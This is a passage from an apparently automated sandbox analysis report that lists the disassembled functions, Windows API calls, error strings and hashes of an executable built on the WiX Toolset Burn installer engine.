                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b65626944ec8cc82e0c96ab1a084fd176fcf6bc364e11cecefba3918a0387e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7610331A85769B2DB3299669C0EF7B6C68EBC5F1AF110060FF45FE2D1D5918E40C7A0
                                                                                                                                                                                                                                                                            Function 00949491 Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 245COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009496EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM content element: %ls, xrefs: 00949695
                                                                                                                                                                                                                                                                            • Failed to process all ATOM content attributes., xrefs: 009495B5
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM content type., xrefs: 00949528
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 009494D3, 009496A4, 009496D5
                                                                                                                                                                                                                                                                            • url, xrefs: 0094953E
                                                                                                                                                                                                                                                                            • Failed to process all ATOM content elements., xrefs: 00949681
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM content scheme., xrefs: 009495C9
                                                                                                                                                                                                                                                                            • type, xrefs: 00949500
                                                                                                                                                                                                                                                                            • crypt32.dll, xrefs: 00949627
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM content value., xrefs: 009496C6
                                                                                                                                                                                                                                                                            • Failed get attributes on ATOM unknown element., xrefs: 009494C4
                                                                                                                                                                                                                                                                            • Failed to get child nodes of ATOM content element., xrefs: 009495FA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM content scheme.$Failed to allocate ATOM content type.$Failed to allocate ATOM content value.$Failed to get child nodes of ATOM content element.$Failed to parse unknown ATOM content element: %ls$Failed to process all ATOM content attributes.$Failed to process all ATOM content elements.$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$type$url
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-2309346703
                                                                                                                                                                                                                                                                            • Opcode ID: 94dafe8bcdd136ebd3e8090e8a5919bd6da80710a5d8f9e718987e30dc733148
                                                                                                                                                                                                                                                                            • Instruction ID: 30c6846f55584f5930dd2a512eea9b58d3cdf25ef1b8db0cf8cbffc587ec18dd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94dafe8bcdd136ebd3e8090e8a5919bd6da80710a5d8f9e718987e30dc733148
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D481EF35A54218FBDF12DB94CC09FAF7B79AF84B14F224199F615AB2D0EB709A00DB50
                                                                                                                                                                                                                                                                            Function 008FC2ED Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 197pipesleepstringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0001C580,008E73DE,00000000,008E6CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 008FC320
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,008E6CF2,00000000,00000000), ref: 008FC32B
                                                                                                                                                                                                                                                                            • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 008FC357
                                                                                                                                                                                                                                                                            • ConnectNamedPipe.KERNEL32(?,00000000), ref: 008FC368
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FC372
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 008FC39E
                                                                                                                                                                                                                                                                            • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 008FC3CF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FC4BB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FC4F2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastNamedPipe$HandleState$ConnectCurrentProcessSleeplstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3141773871-2019809298
                                                                                                                                                                                                                                                                            • Opcode ID: 6f93592f62e3a588dec67394f191718a8b0e21c9a002857c4aab41dddd2b23e0
                                                                                                                                                                                                                                                                            • Instruction ID: af2e5d7c451ff4d3dd89bdf66011afa561b170380d2f9e9c8183901f34bed809
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f93592f62e3a588dec67394f191718a8b0e21c9a002857c4aab41dddd2b23e0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551D672D4022DABE710DAB58D89FBF75A8FB49B55F114125BF00FB280D6649D0087E5
                                                                                                                                                                                                                                                                            Function 008E4B8A Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 195fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(00000000,000000F6,?,00000000,00000000,00000104,00000000,7FFFFFFF,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 008E4C12
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4C20
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 008E4CB8
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4CC5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$CreateNameTemp
                                                                                                                                                                                                                                                                            • String ID: %ls%x.TMP$Failed to allocate buffer for GetTempFileNameW.$Failed to allocate memory for file template.$Failed to allocate temp file name.$Failed to copy temp file string.$Failed to create file: %ls$Failed to create new temp file name.$Failed to create temp file.$Failed to get length of path to prefix.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2316751675-1858670728
                                                                                                                                                                                                                                                                            • Opcode ID: 810292fc4b0ba954887e80791bd041cc477091f90603ab7860346a965728ffff
                                                                                                                                                                                                                                                                            • Instruction ID: edf0146925a78c3388416f618b3eabd7c85830aa4390ec8a8580bfad9e8a68b8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 810292fc4b0ba954887e80791bd041cc477091f90603ab7860346a965728ffff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C513932B413A676DB315A568C4EFAF3968FF43B64F110321BE18FB1D1E2B09D10A691
                                                                                                                                                                                                                                                                            Function 00925BAD Relevance: 29.9, APIs: 4, Strings: 13, Instructions: 177COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000001,?,?,00910D82,00921FD9,8000FFFF,008E6DA2,00000008,00000000,00000000,?,?,8000FFFF,-000000AB), ref: 00925BB6
                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(?,00000000,?,00000001,08000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00925CDD
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: lstrlenW.KERNEL32(0001C580,008E73DE,00000000,008E6CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 008FC320
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: GetCurrentProcessId.KERNEL32(?,?,008E6CF2,00000000,00000000), ref: 008FC32B
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 008FC357
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: ConnectNamedPipe.KERNEL32(?,00000000), ref: 008FC368
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: GetLastError.KERNEL32 ref: 008FC372
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: Sleep.KERNEL32(00000064), ref: 008FC39E
                                                                                                                                                                                                                                                                              • Part of subcall function 008FC2ED: SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 008FC3CF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,00910D82,?,00925B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00925D7A
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,00910D82,?,00925B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00925D8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\embedded.cpp, xrefs: 00925C07, 00925D64
                                                                                                                                                                                                                                                                            • %ls, xrefs: 00925C7B
                                                                                                                                                                                                                                                                            • Failed to create embedded pipe., xrefs: 00925C27
                                                                                                                                                                                                                                                                            • Failed to wait for embedded process to connect to pipe., xrefs: 00925CFC
                                                                                                                                                                                                                                                                            • Failed to wait for embedded executable: %ls, xrefs: 00925D55
                                                                                                                                                                                                                                                                            • Failed to create embedded process at path: %ls, xrefs: 00925CC6
                                                                                                                                                                                                                                                                            • Failed to append user args., xrefs: 00925C8F
                                                                                                                                                                                                                                                                            • Failed to append embedded args., xrefs: 00925C5E
                                                                                                                                                                                                                                                                            • burn.embedded, xrefs: 00925C42
                                                                                                                                                                                                                                                                            • Failed to create embedded pipe name and client token., xrefs: 00925BF8
                                                                                                                                                                                                                                                                            • %ls -%ls %ls %ls %u, xrefs: 00925C4A
                                                                                                                                                                                                                                                                            • Failed to process messages from embedded message., xrefs: 00925D2B
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00925D7A, 00925D8D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Handle$NamedPipeProcess$CloseCurrentState$ConnectErrorLastSleeplstrlen
                                                                                                                                                                                                                                                                            • String ID: %ls$%ls -%ls %ls %ls %u$Failed to append embedded args.$Failed to append user args.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$d:\a\wix4\wix4\src\burn\engine\embedded.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 732280565-3966042190
                                                                                                                                                                                                                                                                            • Opcode ID: beac8b37520eeb0eedde5b6b3f9b88a8a5a140fdc9c0d9341dd451a320daa164
                                                                                                                                                                                                                                                                            • Instruction ID: b960fed09b2c1d6c07d15339e30b87738e721bacae1772a789babd1e74f2d114
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beac8b37520eeb0eedde5b6b3f9b88a8a5a140fdc9c0d9341dd451a320daa164
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4851D831A81B29BBDF129F94DC0AFEE7EB4AF04B14F110111F604FA1D4E3B499509B95
                                                                                                                                                                                                                                                                            Function 009477DD Relevance: 28.3, APIs: 6, Strings: 10, Instructions: 297filememoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,000000FF,?,?,00000078,00000000), ref: 00947817
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00947825
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00947883
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00947892
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00947B0C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00947B1B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                                                                                                                            • String ID: Content-Length not returned for URL: %ls$Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$Range request not supported for URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2028584396-1740225083
                                                                                                                                                                                                                                                                            • Opcode ID: 4531afadfb00a01e0fee1729d00ef8075513784a0f98a56213c9f521e7fc3853
                                                                                                                                                                                                                                                                            • Instruction ID: f78622969d58736b91ce163f7c6ec5d5c62c7a1e1563d36c0ca7e0614a1d0bda
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4531afadfb00a01e0fee1729d00ef8075513784a0f98a56213c9f521e7fc3853
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62A17172E48219ABDF21DFE58C85EAEFA79EF48714F114125FA14B7280E7709D00DBA1
                                                                                                                                                                                                                                                                            Function 008F7249 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 263COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008F7456
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008F7400
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 336948655-1873729996
                                                                                                                                                                                                                                                                            • Opcode ID: 33d85909cbc56b7f9983b048b61e3e3c88e0e8d27d3594f07402c63977c92f63
                                                                                                                                                                                                                                                                            • Instruction ID: abb36a0050084463f9a7a543054c5594683b82ec874e97fb7715bad8a9238254
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33d85909cbc56b7f9983b048b61e3e3c88e0e8d27d3594f07402c63977c92f63
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A812771B44318BBEB11DA658C4AFAF7A79FBC5B15F114068FB04FB281E6B0AD009758
                                                                                                                                                                                                                                                                            Function 008F1481 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 251registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E7162,008E6DEA,00000000,C95B5EC6,?,?,7D8B5756,?,008E6CF2,00000000,00000000,008E6DEA,008E7162,878D5010,008E6CF2), ref: 008F1737
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Unsupported registry key value type. Type = '%u', xrefs: 008F1613
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F15FF, 008F160A, 008F1625, 008F16FB
                                                                                                                                                                                                                                                                            • Failed to change value type., xrefs: 008F16C0
                                                                                                                                                                                                                                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 008F15AC
                                                                                                                                                                                                                                                                            • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 008F170F
                                                                                                                                                                                                                                                                            • Registry key not found. Key = '%ls', xrefs: 008F156E
                                                                                                                                                                                                                                                                            • Failed to format key string., xrefs: 008F14C9
                                                                                                                                                                                                                                                                            • Failed to query registry key value., xrefs: 008F15C3
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F16E9
                                                                                                                                                                                                                                                                            • Failed to read registry value., xrefs: 008F169A
                                                                                                                                                                                                                                                                            • Failed to open registry key., xrefs: 008F1550
                                                                                                                                                                                                                                                                            • Failed to format value string., xrefs: 008F14FB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to change value type.$Failed to format key string.$Failed to format value string.$Failed to open registry key.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3422224897
                                                                                                                                                                                                                                                                            • Opcode ID: 1d2d9dd8c653d72a38e1b6deb1a9978a0c0b6916714a9bc8acb87767391e9173
                                                                                                                                                                                                                                                                            • Instruction ID: 17d67bbb0f2ba57a0184d92a4f1b4662a1f234efedfbb7513796542081b2152e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d2d9dd8c653d72a38e1b6deb1a9978a0c0b6916714a9bc8acb87767391e9173
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B981E331E4061EFBDF12AAA58D4AFBEBA79FF18714F110121FB04F6191E2719E109B91
                                                                                                                                                                                                                                                                            Function 008EE48B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 223processCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 008EE651
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 008EE65B
                                                                                                                                                                                                                                                                            • WaitForInputIdle.USER32(?,?), ref: 008EE6BF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 008EE708
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 008EE71A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
                                                                                                                                                                                                                                                                            • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$d:\a\wix4\wix4\src\burn\engine\approvedexe.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1086122317-729562610
                                                                                                                                                                                                                                                                            • Opcode ID: 6e3addf906dee40421183d22af20d9da325d185b994e5389ddc1079964c841dc
                                                                                                                                                                                                                                                                            • Instruction ID: 285919f6dff088950b64c4cdb36571d85146682c3e8a06985589407f4345a28d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3addf906dee40421183d22af20d9da325d185b994e5389ddc1079964c841dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8671D07190025ABBDB129B96CC46F9EBB78FF16744F004025FA04F61A0E3709E50DB91
                                                                                                                                                                                                                                                                            Function 0092027A Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 214fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000080,00000000,?,?,?,?,00000000,00000000), ref: 00920334
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00920342
